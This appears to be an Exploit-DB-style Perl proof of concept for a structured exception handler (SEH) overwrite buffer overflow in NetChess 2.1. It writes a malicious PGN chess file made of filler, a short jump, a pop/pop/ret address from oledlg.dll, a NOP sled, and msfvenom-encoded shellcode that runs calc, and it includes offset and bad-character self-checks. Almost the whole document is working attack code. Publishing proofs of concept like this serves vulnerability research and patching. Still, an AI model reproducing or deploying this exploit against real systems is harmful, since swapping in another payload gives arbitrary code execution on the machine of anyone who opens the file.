# Exploit Title: NetChess 2.1 Buffer Overflow (SEH)
# Date: 8/1/2022
# Exploit Author: Ugur Eminli
# Vendor Homepage: https://sourceforge.net/projects/avmnetchess/
# Software Link: https://sourceforge.net/projects/avmnetchess/
# Version: 2.1
# Tested on: WinXP SP2 Build 2600
#
# Generates exploit.pgn: 336 bytes of filler up to the SEH record, a short
# JMP in nSEH, a non-SafeSEH pop/pop/ret from oledlg.dll as the handler,
# then a NOP sled and an alpha_upper-encoded windows/exec (calc) payload.

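#!/usr/bin/perl
#
# NetChess 2.1 SEH overwrite PoC -- writes the malicious PGN to disk.
# Run as `perl <this file>`; the shebang is not on line 1 of the listing,
# so the kernel will not honor it when the file is executed directly.
#
# Layout of the generated file:
#   [336 x 0x41][nSEH: JMP SHORT +6][SEH: pop/pop/ret][10 NOP][shellcode][10 NOP]
use strict;
use warnings;

my $file = "exploit.pgn";

# Distance from the start of the buffer to the SEH record (from the crash).
my $junk = "\x41" x 336;

# nSEH: EB 06 = JMP SHORT +6, skipping the 4-byte handler pointer that
# follows and landing on the NOP sled. The two 0xCC bytes are only
# padding to fill the 4-byte slot; they are never executed.
my $next_seh = "\xeb\x06\xcc\xcc";

# SEH handler (little-endian):
# 0x74d31567 : pop edi # pop esi # ret | {PAGE_EXECUTE_READ} [oledlg.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.0
# (C:\WINDOWS\system32\oledlg.dll)
my $seh_handler = "\x67\x15\xd3\x74";

my $nop = "\x90" x 10;

# Bytes the target mangles in the input file. The shellcode was encoded
# to avoid all of them; the check below re-verifies the whole payload so
# a transcription slip (e.g. a lost backslash in a "\xNN" escape) is
# caught before the file is ever loaded in the target.
my @badchars = map { chr hex $_ } qw(
    00 0a 1a 2f 3b 3c 3f 25 28 21 22 23 24 5e 7b 2e 5b 5d
);

# msfvenom -p windows/exec cmd=calc -e x86/alpha_upper -a x86 --platform windows -f pl \
#   -b "\x00\x0a\x1a\x2f\x3b\x3c\x3f\x25\x28\x21\x22\x23\x24\x5e\x7b\x2e\x5b\x5d" EXITFUNC=seh
my $buf =
"\x89\xe7\xd9\xcc\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d" .
"\x38\x4c\x42\x53\x30\x43\x30\x45\x50\x33\x50\x4c\x49\x4d" .
"\x35\x36\x51\x4f\x30\x35\x34\x4c\x4b\x56\x30\x30\x30\x4c" .
"\x4b\x56\x32\x44\x4c\x4c\x4b\x51\x42\x45\x44\x4c\x4b\x34" .
"\x32\x47\x58\x54\x4f\x4e\x57\x31\x5a\x57\x56\x36\x51\x4b" .
"\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c\x44\x42\x56\x4c\x57" .
"\x50\x49\x51\x38\x4f\x44\x4d\x55\x51\x39\x57\x5a\x42\x5a" .
"\x52\x30\x52\x46\x37\x4c\x4b\x51\x42\x52\x30\x4c\x4b\x30" .
"\x4a\x57\x4c\x4c\x4b\x50\x4c\x34\x51\x53\x48\x4b\x53\x30" .
"\x48\x53\x31\x38\x51\x50\x51\x4c\x4b\x46\x39\x37\x50\x43" .
"\x31\x48\x53\x4c\x4b\x50\x49\x44\x58\x5a\x43\x47\x4a\x31" .
"\x59\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x46\x51\x4b" .
"\x4f\x4e\x4c\x49\x51\x38\x4f\x44\x4d\x55\x51\x39\x57\x30" .
"\x38\x4b\x50\x44\x35\x4c\x36\x55\x53\x53\x4d\x4a\x58\x47" .
"\x4b\x53\x4d\x57\x54\x43\x45\x4a\x44\x50\x58\x4c\x4b\x46" .
"\x38\x31\x34\x45\x51\x59\x43\x43\x56\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x46\x38\x45\x4c\x33\x31\x39\x43\x4c\x4b\x45" .
"\x54\x4c\x4b\x45\x51\x58\x50\x4d\x59\x37\x34\x31\x34\x51" .
"\x34\x51\x4b\x31\x4b\x45\x31\x31\x49\x30\x5a\x50\x51\x4b" .
"\x4f\x4b\x50\x51\x4f\x51\x4f\x51\x4a\x4c\x4b\x34\x52\x4a" .
"\x4b\x4c\x4d\x31\x4d\x53\x5a\x45\x51\x4c\x4d\x4c\x45\x4e" .
"\x52\x55\x50\x45\x50\x33\x30\x56\x30\x45\x38\x36\x51\x4c" .
"\x4b\x32\x4f\x4d\x57\x4b\x4f\x58\x55\x4f\x4b\x4b\x4e\x44" .
"\x4e\x37\x42\x4b\x5a\x42\x48\x59\x36\x4a\x35\x4f\x4d\x4d" .
"\x4d\x4b\x4f\x49\x45\x47\x4c\x53\x36\x33\x4c\x44\x4a\x4d" .
"\x50\x4b\x4b\x4b\x50\x32\x55\x43\x35\x4f\x4b\x47\x37\x54" .
"\x53\x54\x32\x52\x4f\x32\x4a\x33\x30\x51\x43\x4b\x4f\x58" .
"\x55\x33\x53\x43\x51\x42\x4c\x55\x33\x45\x50\x41\x41";

my $payload = $junk . $next_seh . $seh_handler . $nop . $buf . $nop;

# Self-checks: the offsets only line up if every escape really produced
# one byte, and the whole file must be free of the bad chars above.
die "junk must be exactly 336 bytes, got " . length($junk) . "\n"
    unless length($junk) == 336;
die "nSEH and SEH handler must be 4 bytes each\n"
    unless length($next_seh) == 4 && length($seh_handler) == 4;
for my $bc (@badchars) {
    my $pos = index($payload, $bc);
    die sprintf("bad char 0x%02x present at offset %d\n", ord($bc), $pos)
        if $pos >= 0;
}

# Three-arg open with a lexical handle; binmode so no newline translation
# can alter the payload if this is run from a Windows perl.
open(my $fh, '>', $file) or die "open $file: $!";
binmode($fh);
print {$fh} $payload;
close($fh) or die "close $file: $!";
print "[+] Exploit File Created: $file (" . length($payload) . " bytes)\n";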